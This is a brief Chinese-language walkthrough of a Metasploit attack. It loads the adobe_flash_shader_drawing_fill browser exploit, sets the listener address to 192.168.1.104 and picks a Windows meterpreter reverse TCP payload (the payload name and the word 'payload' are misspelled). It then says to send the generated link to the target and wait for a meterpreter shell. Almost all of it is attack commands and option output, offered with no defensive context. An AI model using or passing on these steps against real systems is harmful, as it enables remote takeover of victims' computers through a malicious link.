1、use exploit/multi/browser/adobe_flash_shader_drawing_fill

2、show options
看一下参数
Retries true no Allow the browser to retry the moduleSRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0SRVPORT 8080 yes The local port to listen on.SSL false no Negotiate SSL for incoming connectionsSSLCert no Path to a custom SSL certificate (default is randomly generated)URIPATH no The URI to use for this exploit (default is random)

3、set SRVHOST 192.168.1.104
set LHOST 192.168.1.104
set psyload windows/meterpreter/reverce_tcp

4、run回车
然后会有个链接地址,把这个链接地址发给目标

5、返回一个meterpreter,OK

